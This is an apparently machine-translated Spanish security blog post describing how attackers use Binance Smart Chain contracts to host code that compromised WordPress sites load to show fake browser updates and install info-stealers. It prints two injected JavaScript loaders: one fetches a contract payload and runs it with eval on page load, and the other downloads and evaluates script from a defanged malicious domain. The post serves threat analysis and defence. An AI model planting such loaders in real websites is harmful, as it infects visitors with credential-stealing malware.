La cadena de bloques de contratos inteligentes de Binance es explotada por la propagación de malware – Gridinsoft Blog

Los ciberdelincuentes están apareciendo aprovecha los contratos inteligentes de Binance como intermediarios C2, los prefieren al alojamiento normal porque no se pueden eliminar. Actualmente se utiliza para instalar ladrones de información, pero la aplicación potencial para este tipo de propósitos maliciosos puede funcionar con cualquier malware.

Los ciberdelincuentes utilizan BSC como infraestructura C2

Una nueva técnica, creada EtherHiding, fue descrito hace casi medio año, en octubre de 2023. Los analistas han notado una variación en la arquitectura de red de una vieja táctica que engaña a los usuarios para que instalen malware disfrazado de actualizaciones del navegador. En lugar de descargar el código malicioso de los trabajadores de Cloudflare, dirigen su solicitud al contrato inteligente de Binance.

Un contrato inteligente, por su naturaleza, es un fragmento de código que se ejecuta cuando se cumplen ciertas condiciones; en este caso, se envía una solicitud válida. Esto los hace similares a Cloudflare Workers, que permiten que el fraude utilice servidores reales de Cloudflare. para alojar envíos de códigos maliciosos. Sin embargo, la única diferencia aquí es que los contratos inteligentes están alojados en la cadena de bloques, lo que los hace casi imposibles de eliminar. Y probablemente por eso los ciberdelincuentes están empezando a investigarlos, aparte del hecho de que estas ofertas son baratas. Pero hablaremos de eso más adelante.

¿Cómo se propaga el malware a través de los contratos inteligentes de Binance?

La cadena de ataque comienza comprometiendo el sitio web; Los piratas informáticos suelen atacar los sitios web de WordPress, debido a las muchas debilidades de WP como motor de sitios web y a la selección de vulnerabilidades en los complementos populares. Después de comprometer el sitio web, los piratas informáticos instalaron un script especial que se conecta a la API web de Binance.

async function load() {
let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
signer = provider.getSigner(),
address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
ABI = (
{ inputs: ({ internalType: "string", .......},
{ inputs: (), name: "get", ......},
{ inputs: (), name: "link", ....... },
),
contract = new ethers.Contract(address, ABI, provider),
link = await contract.get();
eval(atob(link));
}
window.onload = load;

Entre estas acciones, los atacantes crean nuevos contratos inteligentes y agregan código malicioso al actualizar el contrato. Esto bloquea todo el sistema en la posición «listo para disparar».

Esquema de entrega de malware BCS

Después de ingresar al sitio web designado, el usuario empuja el mecanismohacer el sitio web para enviar el conseguir() aplicaciones para contratos inteligentes relacionados. La respuesta contiene una cadena de código binario; usando el evaluar() tarea, el hacker hace que el navegador web del usuario ejecute este código. Esto bloquea el sitio web y hace que aparezca el mensaje «actualizar navegador».

Los usuarios experimentados pueden sentir que algo extraño está sucediendo, porque el navegador no solicita la actualización de esa manera, pero la mayoría de la gente la aceptará. Al hacer clic en el botón «Actualizar…» en esa pantalla se ejecutará el script descargado del contrato inteligente y se descargará el pago final. Los ciberdelincuentes suelen utilizar sitios web que devuelven pagos el mismo día. Hoy en día, malware como Lumma Stealer, Redline y Vidar utilizan principalmente esta estrategia.

const get_k_script = () => {
let e = new XMLHttpRequest();
return e.open("GET", "https://921hapudyqwdvy(.)com/vvmd54/", !1), e.send(null), e.responseText;
};
eval(get_k_script());

¿Es peligrosa esta nueva práctica?

Es difícil estimar los peligros de este engaño, pero tiene grandes ventajas sobre todos los demás métodos utilizados por el enemigo en el pasado.

Lo más llamativo de ellos es que, como decía: Los contratos inteligentes de Binance son casi imposibles de retirar. Los ciberdelincuentes están dispuestos a pagar mucho dinero para ejecutar su infraestructura en un «alojamiento a prueba de balas». Este es el nombre común para aquellos que tienen poco descanso y no cooperan con las autoridades. Hay algunos parámetros más, pero el BSC los ejecuta todos al mismo tiempo. Basados ​​en la cadena de bloques de intercambios criptográficos masivos, los ataques DDoS son raros. Y es anónimo: al menos los contratos inteligentes no requieren datos personales y no almacenan información sobre el desarrollador.

Otra ventaja, que supera incluso al alojamiento «clásico» a prueba de balas, es el precio. A Binance se le paga por crear, modificar e interactuar con contratos. Pero los actores de amenazas han diseñado sus operaciones de manera que reduzcan los pagos. Todo lo que pagan es una tarifa de creación y luego un pago por actualización, pero el dinero es tan miserable ($0,2 – $0,6) que los atacantes pueden cambiar las cosas casi todos los días.

Básicamente, este nuevo enfoque Podría marcar una gran diferencia en la propagación actual de malware. Una reciente serie de perturbaciones laborales ha dejado claro que el modelo anterior no tiene un futuro prometedor, por decir lo menos. Con la explotación de los contratos inteligentes, independientemente de la cadena de bloques en la que se basen, la propagación del malware puede tomar un nuevo rumbo.

Protéjase contra malos contratos inteligentes de Binance

Aunque el esquema con el contrato negativo de Binance parece difícil de desbaratar, el ataque general consta de varios pasos. Y ese es el lugar el software antimalware adecuado podrá bloquearlo y detener el malware. GridinSoft Anti-Malware le brindará una protección excepcional contra amenazas de red y malware que acechan en su disco duro.

Se prohíbe la propagación de malware a la cadena de bloques de contratos inteligentes de Binance

Puede interesarte

Salida de intercambio de Litecoin

Litecoin Whale retira 20 millones de dólares de Binance: ¿señal alcista?

Los datos en cadena muestran que la ballena Litecoin ha retirado alrededor de $20 millones …

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *